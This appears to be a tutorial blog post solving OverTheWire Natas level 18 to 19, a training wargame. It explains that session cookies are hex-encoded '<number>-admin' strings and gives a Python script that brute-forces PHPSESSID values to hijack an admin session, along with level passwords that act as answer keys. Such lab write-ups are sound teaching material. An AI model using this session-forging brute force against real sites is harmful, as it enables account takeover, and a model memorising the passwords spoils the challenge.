OverTheWire Natas Level 18 → 19 tutorial!!

Login

URL: http://natas19.natas.labs.overthewire.org
Credentials: natas19:tnwER7PdfWkxsG4FNWUtoAZ9VyZTJqJr

# Using curl (optional):
curl -u natas19:tnwER7PdfWkxsG4FNWUtoAZ9VyZTJqJr 
  http://natas19.natas.labs.overthewire.org/

Task

The page says it reuses level 18’s logic, but session IDs are no longer sequential. Goal: obtain an admin session and read the next credentials.

A little bit of Theory

After any login we receive a cookie like:

PHPSESSID=3235352d61646d696e

This looks like hex-encoded ASCII. Decoding gives:

255-admin

So the server’s session key format is <number>-admin, then hexlify. If we try enough numbers, we’ll hit an existing admin session.

Solution

Bruteforce PHPSESSID by hex-encoding "${id}-admin".

import requests, binascii

URL = "http://natas19.natas.labs.overthewire.org"
s = requests.Session()
s.auth = ('natas19', 'tnwER7PdfWkxsG4FNWUtoAZ9VyZTJqJr')

for i in range(1000):  # 0..999 is plenty
    raw = f"{i}-admin".encode()
    sess = binascii.hexlify(raw).decode()
    r = s.get(URL, cookies={"PHPSESSID": sess})
    if "Login as an admin to retrieve" not in r.text:
        print("[+] Admin session found!")
        print(r.text)
        break

Notes:

• We don’t need valid username/password — we only need the right cookie.
• Stop when the page doesn’t show “Login as an admin to retrieve …”.

Password

p5mCvP7GS2K6Bmt3gqhM2Fc1A5T8MVyw

Troubleshooting

• Still seeing the login prompt? → Your cookie likely isn’t admin; keep iterating.
• Getting 403s or rate limits? → Add a small time.sleep(0.05) between requests.
• Hex looks wrong? → Ensure you .encode() then binascii.hexlify(...).decode().

Nice work 🎉 You reversed the session format and snagged the admin creds. Onward to natas20!

Thanks for reading!

Until next time — Otsumachi!! 💖☄️✨